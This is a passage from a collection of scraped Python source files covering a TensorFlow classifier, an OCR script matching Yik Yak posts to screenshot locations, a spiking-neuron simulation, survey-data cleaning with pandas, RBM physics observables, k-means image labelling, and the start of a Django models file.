np.array(y_data_array)\n\nX = tf.placeholder(tf.float32)\nY = tf.placeholder(tf.float32)\n\nW1 = tf.Variable(tf.random_uniform([6, 30], -1.0, 1.0))\nb1 = tf.Variable(tf.zeros(30))\n\nW2 = tf.Variable(tf.random_uniform([30, 60], -1.0, 1.0))\nb2 = tf.Variable(tf.zeros(60))\n\nW3 = tf.Variable(tf.random_uniform([60, 50], -1.0, 1.0))\nb3 = tf.Variable(tf.zeros(50))\n\nW4 = tf.Variable(tf.random_uniform([50, 7], -1.0, 1.0))\nb4 = tf.Variable(tf.zeros(7))\n\nL1 = tf.add(tf.matmul(X, W1), b1)\nL1 = tf.nn.relu(L1)\n\nL2 = tf.add(tf.matmul(L1, W2), b2)\nL2 = tf.nn.relu(L2)\n\nL3 = tf.add(tf.matmul(L2, W3), b3)\nL3 = tf.nn.relu(L3)\n\nmodel = tf.add(tf.matmul(L3, W4), b4)\n\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=Y, logits=model))\noptimizer = tf.train.AdamOptimizer(0.001)\ntrain_op = optimizer.minimize(cost)\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nfor step in range(30000):\n sess.run(train_op, feed_dict={X:x_data, Y:y_data})\n\n if((step + 1) % 100 == 0):\n print(step+1, sess.run(cost, feed_dict={X:x_data, Y:y_data}))\n\nprediction = tf.argmax(model, axis=1)\ntarget = tf.argmax(Y, axis=1)\n\nprint(sess.run(prediction, feed_dict={X: x_data}))\nprint(sess.run(target, feed_dict={Y: y_data}))\n\nis_correct = tf.equal(prediction, target)\naccuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))\nprint('정확도: %.2f' % sess.run(accuracy * 100, feed_dict={X:x_data, Y:y_data}))","sub_path":"NeuralNet_real.py","file_name":"NeuralNet_real.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"281045229","text":"from PIL import Image\nimport numpy as np\nimport cv2\nimport os.path\nimport time\nfrom pytesser import *\nfrom difflib import SequenceMatcher\nimport copy\n\n'''YakFinder takes a directory of images, stored as the variable \"directory\" and \na list of posted yaks (stored in a text file as [Yak ID],[Yak text],[latitude],[longitude])\nand outputs a text file containing the latitude and longitude, and the ID's of the yaks that \nappear at that location. \n\nWHAT YOU NEED TO DO TO MAKE IT RUN:\nThe directory variable is the path to the folder containing the screenshots you want to test.\n\nThe YakFile variable should be a text document that contains the ID's, text, and locations of the \nposted yaks, as explained above. \n\nThe barImg variable is used for splitting the image into individual yaks, and it should work as \nlong as you always use the picture currently in the dropbox.\n\nIn the write_dict function you need to change the outfile directory to wherever you would like to \nsave the text file.\n\nADDITIONAL FUNCTIONALITY:\nEvery twenty images, (this can be changed in line 66), the program will update you on how long it \nhas been running, and give an estimate of the time left (based on the total number of photos, which\ncan be changed in line 45 by changing the totalPics variable).\n'''\nglobal failed, SIMILARITY\n\ndef main():\n global failed, SIMILARITY\n SIMILARITY = .8\n failed = []\n\n locDict = {}\n yakDict = {}\n\n yakFile = open(\"C:/Users/sumproj/Dropbox/YikYak/Yaks/yaks6.txt\",\"r\")\n for line in yakFile:\n yakDict[line.split(',')[1]] = line.split(',')[0]\n yakFile.close()\n\n directory = \"C:/Users/sumproj/Desktop/Screenshots1\"\n barImg = cv2.imread(('C:/Users/sumproj/Desktop/OCR Stuff/grayBar.png'),0)\n\n totalPics = 2994\n picNum = 0\n startTime = time.time()\n\n count = 0\n for filename in os.listdir(directory):\n picNum += 1\n count += 1\n #Can use the below lines to cut off the function after a certain number of images\n #if count == 10:\n # break\n\n if filename == \"Thumbs.db\":\n continue\n currentImage = cv2.imread((directory + \"/\" + filename), 0)\n coordinate = get_location(filename)\n yaksSeen = get_yaks(yakDict, currentImage, barImg)\n if yaksSeen == -1:\n failed.append(filename)\n continue\n if not (coordinate in locDict.keys()):\n locDict[coordinate] = yaksSeen\n else:\n for yak in yaksSeen:\n if yak not in locDict[coordinate]:\n locDict[coordinate].append(yak)\n locDict[coordinate].sort()\n\n if picNum % 20 == 0:\n timeLeft = (time.time()-startTime)/(60.0*picNum)*(totalPics-picNum)\n print(str(picNum) + \"/\" + str(totalPics) + \" \" + \"apprx. \" + str(timeLeft) + \" min left\")\n \n print('The following files failed:', failed)\n print('time elapsed ' + str((time.time()-startTime)))\n print('\\nReady to write')\n write_dict(locDict)\n write_failed(failed)\n print('\\nDone')\n\ndef write_dict(locDict):\n '''Writes the contents of the LocDict Object to a text file. This dictionary maps\n a location to what yaks can be seen at that location'''\n\n outFile = open(\"C:/Users/sumproj/Desktop/OCR Stuff/coordinate_map1.txt\", 'w')\n for key in locDict.keys():\n ids = locDict[key]\n outFile.write(key)\n for i in ids:\n outFile.write(\",\"+i)\n outFile.write('\\n')\n outFile.close()\n\ndef write_failed(failed):\n '''Writes the contents of the failed list to a text file so that you can look at\n the images manually. There is a helper file called FailedChecker that you can use\n to view the images.'''\n\n outfile = open(\"C:/Users/sumproj/Desktop/OCR Stuff/failed1.txt\", 'w')\n for filename in failed:\n outfile.write(filename)\n outfile.write('\\n')\n outfile.close()\n\ndef get_location(inStr):\n '''Gets location from file name'''\n\n splitLine = inStr.split(\"_\")\n return splitLine[0]+\",\"+splitLine[1]\n\ndef get_yaks(yakDict, img, barImg):\n '''Finds what yaks appear in an image. The image is first split into each individual yak (cropYaks)\n and then OCR is performed.'''\n try:\n matchedImg = cv2.matchTemplate(img, barImg, 5)\n discard, matchedImg = cv2.threshold(matchedImg, .7, 1, cv2.THRESH_BINARY)\n barLocs = get_y_values(matchedImg)\n return cropYaks(img, barLocs, yakDict, SIMILARITY)\n except cv2.error:\n print('Open CV error')\n return -1\n\ndef get_y_values(img):\n '''This function is used in splitting the yak image.'''\n toReturn = []\n for i in range(len(img)):\n if img[i][0] == 1:\n toReturn.append(i)\n\n return toReturn\n\ndef cropYaks(arr, locList, yakDik, ratio):\n '''Splits the image into individual yaks, and performs OCR on the individual yak images.'''\n\n try:\n imgYaks = []\n prev = 0\n cutUp, cutDown = 19, 5\n saveArr = arr\n arr = arr[:-cutUp, :]\n for loc in locList:\n if prev + cutDown > loc - cutUp:\n prev = loc\n continue\n newArr = arr[prev+cutDown: loc-cutUp,:]\n #cv2.imshow('test',newArr)\n #cv2.waitKey(0)\n #cv2.destroyAllWindows()\n new_img = Image.fromarray(newArr.astype('uint8'),'L')\n y = image_to_string(new_img).strip()\n if y:\n imgYaks.append(y)\n prev = loc\n\n ids = []\n for yak in yakDik.keys():\n inside = False\n for newYak in imgYaks:\n if similar(yak, newYak) >= ratio:\n inside = True\n if inside: ids.append(yakDik[yak]) \n\n return ids\n except IOError:\n '''Sometimes tesseract runs into a permission error when saving files, this except clause\n prevents it for ruining the program.'''\n #print(\"exceptin\")\n return cropYaks(saveArr, locList, yakDik, ratio)\n except SystemError:\n '''Sometimes tesseract runs into a weird error reading images, this except clause\n prevents it for ruining the program.'''\n #print(\"exceptin\")\n print(\"Tile Error\")\n return -1\n\n \ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\nmain()","sub_path":"OCR stuff/YakFinder2.py","file_name":"YakFinder2.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"350516343","text":"import numpy as np\nimport matplotlib\n\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\nclass System:\n def __init__(self, no_of_neurons):\n self.n = [self.Neuron(i) for i in range(no_of_neurons)]\n\n def connect(self, i, j):\n self.n[i].gc.append(j)\n self.n[j].gc.append(i)\n\n class Neuron:\n def __init__(self, i):\n self.ID = i\n # state\n self.v = -65.\n self.u = -65. * 0.2\n self.i_gc = 0\n # gap junctions\n self.gc = []\n self.gsyn = 0.0\n # external input\n self.I = 0.\n\n def collect_gc_input(self, n_vec):\n i_gc = 0\n for i in self.gc:\n i_gc += self.gsyn * (n_vec[i].V - self.v)\n return i_gc\n\n\nclass Integrate:\n def __init__(self, dt):\n self.dt = dt\n\n def forward_euler(self, _sys):\n self.system = _sys\n rhs = self._rhs()\n for i, (n, n_rhs) in enumerate(zip(self.system.n, rhs.n)):\n if self.system.n[i].v >= 30.:\n self.system.n[i].v = -65.\n self.system.n[i].u += 8.\n\n self.system.n[i].v += self.dt * n_rhs.v\n self.system.n[i].u += self.dt * n_rhs.v\n self.system.n[i].i_gc = n_rhs.i_gc\n\n def _rhs(self):\n rhs = System(len(self.system.n))\n for ii, (n_new, n_old) in enumerate(zip(rhs.n, self.system.n)):\n rhs.n[ii].v = 0.04*n_old.v*n_old.v + 5.*n_old.v + 140. - n_old.u + n_old.I # + n_old.I_gc\n rhs.n[ii].u = 0.002 * (0.2 * n_old.v - n_old.u)\n rhs.n[ii].i_gc = n_old.collect_gc_input(sys)\n return rhs\n\nN = 6000\ndt = 0.1\n\nInt = Integrate(dt)\n\nsys = System(3)\nvu = np.zeros(shape=(4, N))\n\nfor i in range(N):\n if i == 1000:\n sys.n[1].I = 5.\n if i == 2000:\n sys.n[1].I = 0.\n if i == 3000:\n sys.n[1].I = 5.\n if i == 4000:\n sys.n[1].I = 0.\n Int.forward_euler(sys)\n vu[0][i] = sys.n[1].v\n vu[1][i] = sys.n[1].u\n vu[2][i] = sys.n[1].i_gc\n vu[3][i] = sys.n[1].I\n\nplt.plot(np.arange(0, N * dt, dt), vu[0])\nplt.plot(np.arange(0, N * dt, dt), vu[1])\nplt.plot(np.arange(0, N * dt, dt), vu[3])\nplt.show()\n","sub_path":"prelim/simple_chain/py_source/regular_spiking_2.py","file_name":"regular_spiking_2.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"490511776","text":"# http://judge.u-aizu.ac.jp/onlinejudge/description.jsp?id=ITP2_4_A&lang=jp\n# Reverse\n\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\ndef main():\n n1 = int(input())\n l1 = list(map(int,input().split()))\n for i in range(int(input())):\n (a,b) = map(int,input().split())\n for ni in range((b-a)//2):\n l1[a+ni],l1[b-1-ni] = l1[b-1-ni],l1[a+ni]\n print (\" \".join(map(str,l1)))\n\n\nif __name__ == '__main__':\n main()","sub_path":"ITP2/ITP2_4_A.py","file_name":"ITP2_4_A.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"628305019","text":"import pandas as pd\nimport numpy as np\nimport sqlscripts\nimport pypyodbc\n\n'''This script is a way to get and process SQL Queries so that they are immediately amenable to analytics in a variety of ways. To that end, I've made most variables on the suvey into categorical variables\nreplaced unanswered portions with 0s (methodologically debatable, but often necessary), and combined different layerings of historical data, at least in the output. Better layering could be done on the SQL side to avoid\nsuch methodological problems, but this seems defendable in the immediate context (and is easy enough to change).'''\n\n\ndef connecttodb(sqlquery1, sqlquery2):\n cnxn = pypyodbc.connect(driver='{SQL Server}', server = 'HQOLYMSQL09P', database = 'CTRSurvey')\n df1 = pd.read_sql_query(sqlquery1, cnxn)\n df1 = df1.pivot(index = 'surveyresponseid', columns = 'question', values = 'domainvaluetext')\n df2 = pd.read_sql_query(sqlquery2, cnxn)\n df2 = df2.set_index('surveyresponseid')\n df = pd.concat([df1, df2], axis=1)\n return df\n\ndef changecolumnnames(df, columndictionary):\n df = df.rename(columns=columndictionary)\n df = df.drop('irrelevant', axis = 1)\n return df\n\ndef concatenateddf(df, columnname):\n newdf = pd.get_dummies(df[columnname])\n df = pd.concat([newdf, df], axis = 1)\n df = df.drop(columnname, axis = 1)\n return df\n\ndef change_labels(df, columnname):\n labels = columnname.split('_')\n suffix = labels[1]\n df[columnname] = df[columnname].replace('No Answer/Blank', '0')\n df[columnname] = df[columnname].replace(np.nan, '0')\n df[columnname] = df[columnname].replace('Did Not Work(day off, sick, etc.)', 'TransType_' + suffix + '_dayoff')\n df[columnname] = df[columnname].str.replace('Drove Alone', 'TransType_' + suffix + '_sov')\n df[columnname] = df[columnname].str.replace('Teleworked', 'TransType_' + suffix + '_telework')\n df[columnname] = df[columnname].str.replace('Took The bus', 'TransType_' + suffix + '_bus')\n df[columnname] = df[columnname].str.replace('Carpooled', 'TransType_' + suffix + '_carpool')\n df[columnname] = df[columnname].str.replace('Walked', 'TransType_' + suffix + '_walked')\n df[columnname] = df[columnname].str.replace('Rode The Train/light rail/streetcar', 'TransType_' + suffix + '_rail')\n df[columnname] = df[columnname].str.replace('Rode A Bicycle', 'TransType_' + suffix + '_bike')\n df[columnname] = df[columnname].str.replace('Compressed WorkWeek Day Off', 'TransType_' + suffix + '_compressww')\n df[columnname] = df[columnname].str.replace('Other', 'TransType_' + suffix + '_other')\n df[columnname] = df[columnname].str.replace('Motorcycle/Moped', 'TransType_' + suffix + '_2wheeledvehicle')\n df[columnname] = df[columnname].str.replace('Overnight Business Trip', 'TransType_' + suffix + '_businesstrip')\n df[columnname] = df[columnname].str.replace('Vanpooled', 'TransType_' + suffix + '_vanpool')\n df[columnname] = df[columnname].str.replace('Boarded ferry with car/van/bus', 'TransType_' + suffix + '_driveonferry')\n df[columnname] = df[columnname].str.replace('Used ferry as walk-on passenger', 'TransType_' + suffix + '_walkonferry')\n df[columnname] = df[columnname].fillna(0)\n dummydf = pd.get_dummies(df[columnname])\n dummydf = dummydf.drop('0', axis = 1)\n df = pd.concat([dummydf, df], axis = 1)\n df = df.drop(columnname, axis = 1)\n return df\n\ndef likelytotry(df, columnname):\n labels = columnname.split('try')\n suffix = labels[1]\n df[columnname] = df[columnname].str.replace(\"Not An Option\", 'AttitudeToCTR' + \"NotAnOption\" + suffix)\n df[columnname] = df[columnname].str.replace(\"Not Likely\", 'AttitudeToCTR' + \"LowLikelihood\" + suffix)\n df[columnname] = df[columnname].str.replace(\"Likely\", 'AttitudeToCTR' + \"Likely\" + suffix)\n df[columnname] = df[columnname].str.replace(\"Do Now\", 'AttitudeToCTR' + \"DoNow\" + suffix)\n df[columnname] = df[columnname].replace(\"No Answer/Blank\", np.nan)\n df[columnname] = df[columnname].fillna(0)\n dummydf = pd.get_dummies(df[columnname])\n df = pd.concat([dummydf, df], axis = 1)\n df = df.drop(columnname, axis = 1)\n df = df.drop(0, axis = 1)\n return df\n\ndef fixtranstype(df):\n df = change_labels(df, 'TransType_Mon')\n df = change_labels(df, 'TransType_Tue')\n df = change_labels(df, 'TransType_Wed')\n df = change_labels(df, 'TransType_Thu')\n df = change_labels(df, 'TransType_Fri')\n df = change_labels(df, 'TransType_Sat')\n df = change_labels(df, 'TransType_Sun')\n return df\n\ndef fixattitudinaldata(df):\n if 'likelytotryCompressed' or 'likelytotrycarpool' in df:\n df = likelytotry(df, 'likelytotryCompressed')\n df = likelytotry(df, 'likelytotrycarpool')\n df = likelytotry(df, 'likelytotryVAN')\n df = likelytotry(df, 'likelytotrybus')\n df = likelytotry(df, 'likelytotryTrain')\n df = likelytotry(df, 'likelytotryBicycle')\n df = likelytotry(df, 'likelytotryWalking')\n df = likelytotry(df, 'likelytotryTeleWork')\n return df\n\ndef categoricaltransitdata(df):\n rail = df.columns[df.columns.str.contains('TransType' and 'rail')]\n bus = df.columns[df.columns.str.contains('TransType' and '_bus')]\n transit = rail.tolist() + bus.tolist()\n df['transitscore'] = df[transit].sum(axis=1)\n df['UsesTransit'] = np.where(df['transitscore'] > 0, 1, 0)\n df['RegularTransitRider'] = np.where(df['transitscore'] > 3, 1, 0)\n df = df.drop('transitscore', axis=1)\n return df\n\ndef cleaning_function(df):\n # cleans up commuter participation variable\n if 'BeginWorkBetween6and9am' in df:\n df['BeginWorkBetween6and9am'] = df['BeginWorkBetween6and9am'].str.replace('Yes', 'Beginbtw6and9am')\n df['BeginWorkBetween6and9am'] = df['BeginWorkBetween6and9am'].str.replace('No', 'DidNotBeginbtw6and9am')\n df['BeginWorkBetween6and9am'] = df['BeginWorkBetween6and9am'].fillna(0)\n df = concatenateddf(df, 'BeginWorkBetween6and9am')\n\n # cleans up paying for parking variable\n if 'PayforParking' in df:\n df.PayforParking = df.PayforParking.replace('Yes', 'PaidforParking')\n df.PayforParking = df.PayforParking.replace('No', 'DidNotPayforParking')\n df.PayforParking = df.PayforParking.fillna(0)\n df = concatenateddf(df, 'PayforParking')\n\n # cleans up and featurizes telework days\n if 'HowManyTeleworkDaysintwoweeks' in df:\n df.HowManyTeleworkDaysintwoweeks = df.HowManyTeleworkDaysintwoweeks.astype(str)\n df.HowManyTeleworkDaysintwoweeks = df.HowManyTeleworkDaysintwoweeks.apply(lambda x: x.lower())\n df.HowManyTeleworkDaysintwoweeks = df.HowManyTeleworkDaysintwoweeks.str.replace('no days', '0')\n df.HowManyTeleworkDaysintwoweeks = df.HowManyTeleworkDaysintwoweeks.str.replace(' days', '')\n df.HowManyTeleworkDaysintwoweeks = df.HowManyTeleworkDaysintwoweeks.str.replace(' day', '')\n df.HowManyTeleworkDaysintwoweeks = df.HowManyTeleworkDaysintwoweeks.str.replace('no answer/blank', '0')\n df.HowManyTeleworkDaysintwoweeks = df.HowManyTeleworkDaysintwoweeks.str.replace('none', '0')\n df.HowManyTeleworkDaysintwoweeks = df.HowManyTeleworkDaysintwoweeks.str.replace('nan', '0')\n df.HowManyTeleworkDaysintwoweeks = df.HowManyTeleworkDaysintwoweeks.astype(float)\n\n # checks in on Telework\n if 'Teleworkinpasttwoweeks' in df.columns:\n df.Teleworkinpasttwoweeks = df.Teleworkinpasttwoweeks.str.replace('Yes', \"TeleworkedInPastTwoWeeks\")\n df.Teleworkinpasttwoweeks = df.Teleworkinpasttwoweeks.replace('No Answer/Blank', 0)\n df.Teleworkinpasttwoweeks = df.Teleworkinpasttwoweeks.str.replace('No', 'DidNotTeleworkInPastTwoWeeks')\n df.Teleworkinpasttwoweeks = df.Teleworkinpasttwoweeks.fillna(0)\n df = concatenateddf(df, 'Teleworkinpasttwoweeks')\n # cleans up the work schedule column\n\n if 'SOVRecentDayDidYouPayToPark' in df:\n df['SOVRecentDayDidYouPayToPark'] = df['SOVRecentDayDidYouPayToPark'].str.replace('Yes', 'SOVPaidToParkMostRecentDay')\n df['SOVRecentDayDidYouPayToPark'] = df['SOVRecentDayDidYouPayToPark'].str.replace('No', 'SOVDidNotPayToParkMostRecentDay')\n df['SOVRecentDayDidYouPayToPark'] = df['SOVRecentDayDidYouPayToPark'].str.replace(\"I don't drive alone\", 'NeverSOVPayToParkMostRecentDay')\n df['SOVRecentDayDidYouPayToPark'] = df['SOVRecentDayDidYouPayToPark'].fillna(0)\n df = concatenateddf(df, 'SOVRecentDayDidYouPayToPark')\n if 'HowOftenDoYouTelework' in df:\n\n df['HowOftenDoYouTelework'] = df['HowOftenDoYouTelework'].str.replace(\"1 day/week\", 'TeleworkOnceAWeek')\n df['HowOftenDoYouTelework'] = df['HowOftenDoYouTelework'].str.replace(\"1-2 days/month\", 'TeleworkACoupleTimesAMonth')\n df['HowOftenDoYouTelework'] = df['HowOftenDoYouTelework'].str.replace(\"2 days/week\",'TeleworkTwiceAWeek')\n df['HowOftenDoYouTelework'] = df['HowOftenDoYouTelework'].str.replace(\"3 days/week\", 'TeleworkThriceAWeek')\n df['HowOftenDoYouTelework'] = df['HowOftenDoYouTelework'].str.replace(\"I don't telework\", 'TeleworkNever')\n df['HowOftenDoYouTelework'] = df['HowOftenDoYouTelework'].str.replace(\"Occasionally, on an as-needed basis\", 'TeleworkOccasionally')\n df['HowOftenDoYouTelework'] = df['HowOftenDoYouTelework'].str.replace(\"0\",'TeleworkNever')\n df = concatenateddf(df, 'HowOftenDoYouTelework')\n df.WorkSchedule = df.WorkSchedule.str.replace('3 days a week', 'WS_3days/week')\n df.WorkSchedule = df.WorkSchedule.str.replace('5 days a week', 'WS_5days/week')\n df.WorkSchedule = df.WorkSchedule.replace('No Answer/Blank', 0)\n df.WorkSchedule = df.WorkSchedule.str.replace('Other', 'WS_otherdays/week')\n df.WorkSchedule = df.WorkSchedule.str.replace('7 days in 2 weeks', 'WS_7days/2weeks')\n df.WorkSchedule = df.WorkSchedule.str.replace('4 days a weeks', 'WS_4tenhrdaysweek')\n df.WorkSchedule = df.WorkSchedule.str.replace('9 Days in 2 weeks', 'WS_9days/2weeks')\n df.WorkSchedule = df.WorkSchedule.str.replace(r\"\\(.*\\)\", \"\")\n df.WorkSchedule = df.WorkSchedule.str.strip()\n worksched = pd.get_dummies(df.WorkSchedule)\n df = pd.concat([worksched, df], axis=1)\n df = df.drop(\"WorkSchedule\", axis=1)\n # cleaning function for question 1, Employment Status\n worktime = pd.get_dummies(df['EmploymentStatus'])\n df = pd.concat([worktime, df], axis=1)\n df = df.drop('EmploymentStatus', axis=1)\n # turns typical week into a dummy variable\n df.TypicalWeek = df.TypicalWeek.str.replace('Yes', 'TypicalWeek')\n df.TypicalWeek = df.TypicalWeek.replace('No Answer/Blank', 0)\n df.TypicalWeek = df.TypicalWeek.str.replace('No', 'AtypicalWeek')\n typical = pd.get_dummies(df.TypicalWeek)\n df = pd.concat([typical, df], axis=1)\n df = df.drop('TypicalWeek', axis=1)\n # cleaning and transformation function for number of people in car or van pool\n df['PeopleInVanOrCarpool'] = df['PeopleInVanOrCarpool'].astype(str)\n df['PeopleInVanOrCarpool'] = df['PeopleInVanOrCarpool'].apply(lambda x: x.lower())\n df['PeopleInVanOrCarpool'] = df['PeopleInVanOrCarpool'].str.replace(' persons', \"\")\n df['PeopleInVanOrCarpool'] = df['PeopleInVanOrCarpool'].str.replace(' person', \"\")\n df['PeopleInVanOrCarpool'] = df['PeopleInVanOrCarpool'].str.replace(' people', \"\")\n df['PeopleInVanOrCarpool'] = df['PeopleInVanOrCarpool'].str.replace('no answer/blank', '0')\n df['PeopleInVanOrCarpool'] = df['PeopleInVanOrCarpool'].str.replace('nan', '0')\n df['PeopleInVanOrCarpool'] = df['PeopleInVanOrCarpool'].astype(float)\n df = df.replace('Yes', 1)\n df = df.replace('No', 0)\n df = df.replace('No Answer/Blank', 0)\n df = df.drop(0, axis = 1)\n return df\ndef Main(filename):\n df = connecttodb(sqlscripts.sqlscript1, sqlscripts.sqlscript2)\n df = changecolumnnames(df, sqlscripts.labelcoding)\n df = fixtranstype(df)\n df = fixattitudinaldata(df)\n df = cleaning_function(df)\n df = categoricaltransitdata(df)\n df.to_csv(filename)\nif __name__ == \"__main__\":\n Main(r'C:\\Users\\SchumeN\\Documents\\I5wideningproject\\whatcomctrdataraw.csv')","sub_path":"ctrexportdata.py","file_name":"ctrexportdata.py","file_ext":"py","file_size_in_byte":12096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"405814522","text":"import re\n\nimport torch\nfrom torch.distributions.utils import log_sum_exp\n\n__all__ = [\n \"Observable\",\n \"TFIMChainEnergy\",\n \"TFIMChainMagnetization\"\n]\n\n\ndef format_alias(s):\n alias = s.strip(' _')\n if \" \" not in alias:\n # cf. https://stackoverflow.com/a/1176023\n alias = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', alias)\n alias = re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', alias)\n else:\n alias = format_alias(alias.strip(' _')\n .replace(' ', '_'))\n\n return (alias.lower()\n .strip(' _')\n .replace('__', '_')\n .replace(' ', ''))\n\n\ndef to_pm1(samples):\n return samples.mul(2.).sub(1.)\n\n\ndef to_01(samples):\n return samples.add(1.).div(2.)\n\n\nclass Observable:\n def __init__(self, name=None, variance_name=None, **kwargs):\n self.name = name\n self.mean_name = name if name else \"mean\"\n\n if variance_name: # alias the variance function\n # if someone manages to put in a mangled enough string to\n # break this...they brought it on themselves\n variance_alias = format_alias(variance_name)\n setattr(self, variance_alias, self.variance)\n self.variance_name = variance_name\n else:\n self.variance_name = \"variance\"\n\n def apply(self, samples, sampler):\n pass\n\n def sample(self, sampler, num_samples, observable=None, **kwargs):\n if observable is None:\n observable = self.name\n return self.apply(sampler.sample(num_samples, sampler=sampler, observable=observable, **kwargs), sampler)\n\n def expected_value(self, sampler, num_samples, batch_size=0, **kwargs):\n stats = self.statistics(sampler, num_samples, batch_size, **kwargs)\n return stats[\"mean\"]\n\n def variance(self, sampler, num_samples, batch_size=0, **kwargs):\n stats = self.statistics(sampler, num_samples, batch_size, **kwargs)\n return stats[\"variance\"]\n\n def statistics(self, sampler, num_samples, batch_size, **kwargs):\n batch_size = num_samples if batch_size <= 0 else batch_size\n num_reg_batches, rem = divmod(num_samples, batch_size)\n batches = [batch_size] * num_reg_batches\n if rem != 0:\n batches.append(rem)\n\n def update_statistics(avg_a, var_a, len_a, avg_b, var_b, len_b):\n if len_a == len_b == 0:\n return 0.0\n\n new_len = len_a + len_b\n new_mean = ((avg_a * len_a) + (avg_b * len_b)) / new_len\n\n delta = avg_b - avg_a\n scaled_var_a = var_a * (len_a - 1)\n scaled_var_b = var_b * (len_b - 1)\n\n new_var = scaled_var_a + scaled_var_b\n new_var += ((delta ** 2) * len_a * len_b / float(new_len))\n new_var /= float(new_len - 1)\n\n return new_mean, new_var, new_len\n\n running_mean = 0.0\n running_var = 0.0\n running_length = 0\n\n for batch_size in batches:\n samples = self.sample(sampler, batch_size, **kwargs)\n batch_mean = samples.mean().item()\n batch_var = samples.var().item()\n\n running_mean, running_var, running_length = \\\n update_statistics(running_mean, running_var, running_length,\n batch_mean, batch_var, batch_size)\n\n return {\n \"mean\": running_mean,\n \"variance\": running_var\n }\n\n\nclass TFIMChainEnergy(Observable):\n def __init__(self, h, density=True, name=\"Energy\",\n variance_name=\"Heat Capacity\", **kwargs):\n super(TFIMChainEnergy, self).__init__(name=name,\n variance_name=variance_name)\n self.h = h\n self.density = density\n\n @staticmethod\n def _flip_spin(i, s):\n s[:, i] *= -1.0\n\n def apply(self, samples, sampler):\n samples = to_pm1(samples)\n log_psis = sampler.rbm_module.effective_energy(to_01(samples)).div(2.)\n\n shape = log_psis.shape + (samples.shape[-1],)\n log_flipped_psis = torch.zeros(*shape,\n dtype=torch.double,\n device=sampler.rbm_module.device)\n\n for i in range(samples.shape[-1]): # sum over spin sites\n self._flip_spin(i, samples) # flip the spin at site i\n log_flipped_psis[:, i] = sampler.rbm_module.effective_energy(\n to_01(samples)\n ).div(2.)\n self._flip_spin(i, samples) # flip it back\n\n log_flipped_psis = log_sum_exp(\n log_flipped_psis, keepdim=True).squeeze()\n\n interaction_terms = ((samples[:, :-1] * samples[:,1:]).sum(1) +\n samples[:,0] * samples[:,samples.shape[-1]-1])\n # sum over spin sites\n \n transverse_field_terms = (log_flipped_psis\n .sub(log_psis)\n .exp()) # convert to ratio of probabilities\n\n energy = (transverse_field_terms\n .mul(self.h)\n .add(interaction_terms)\n .mul(-1.))\n\n if self.density:\n return energy.div(samples.shape[-1])\n else:\n return energy\n\n\nclass TFIMChainMagnetization(Observable):\n def __init__(self, name=\"Magnetization\",\n variance_name=\"Susceptibility\", **kwargs):\n super(TFIMChainMagnetization, self).__init__(\n name=name, variance_name=variance_name)\n\n def apply(self, samples, sampler=None):\n return (to_pm1(samples)\n .mean(1)\n .abs())\n","sub_path":"examples/observables_tutorial.py","file_name":"observables_tutorial.py","file_ext":"py","file_size_in_byte":5682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"277862738","text":"import numpy as np\nfrom imageio import imread, imwrite\nfrom sklearn.cluster import KMeans\nfrom model_data import Model_data\nimport glob\n\npath = 'labels/imgs/'\nim_reg = '*.png'\n\nimages = []\nim_paths = []\n\nfor im in glob.glob(path + im_reg):\n # if len(images) > 1:\n # break\n if \"anno\" not in im:\n images.append(imread(im)[:, :, 0].reshape(1024, 1024, 1, 1))\n im_paths.append(im)\n\n\nn = len(images)\n\ndatam = Model_data(kernel_size=(11, 11, 1), flat_features=True)\n\nXtrain, ytrain = datam.handle_images(images)\nsub_Xtrain = Xtrain[np.random.choice(Xtrain.shape[0], 3000000, False)]\nprint(Xtrain.shape)\nprint(n)\n\nmodel = KMeans(n_clusters=16, n_jobs=6, verbose=0)\nmodel.fit(sub_Xtrain)\npred = model.predict(Xtrain)\npred = pred.reshape((n, 1024, 1024))\nfor i in range(pred.shape[0]):\n fname = \"%s_kmeans_anno.png\" % (im_paths[i])\n imwrite(fname, pred[i])\n","sub_path":"labels/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"320639098","text":"__author__ = 'LMai'\nfrom distutils.core import setup\nimport py2exe\n\n# setup(console=['etf_upload.py'],\n# options={\"py2exe\": {\"includes\": \"decimal\"}})\n\nsetup(\n options={'py2exe': {'bundle_files': 1, 'compressed': True, 'includes': 'decimal'}\n ,'packages': ['elementtree', 'xml']\n },\n console=[{'script': \"etf_upload.py\"}],\n zipfile=None,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"551505223","text":"from itertools import cycle, chain\nimport string\nfrom collections import defaultdict\n\nfrom django.core.urlresolvers import reverse\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.utils import timezone\nfrom django.utils.safestring import mark_safe\nfrom django.utils.timezone import now\nfrom django.utils.translation import ugettext_lazy as _\nfrom unidecode import unidecode\n\nfrom pingpong.helpers import berger_tables, shuffled\n\n\nclass XOR_Q:\n def __xor__(self, other):\n not_self = self.clone()\n not_other = other.clone()\n not_self.negate()\n not_other.negate()\n\n x = self & not_other\n y = not_self & other\n\n return x | y\n\n\nQ.__bases__ += (XOR_Q, )\n\nGENDER_CHOICES = (\n 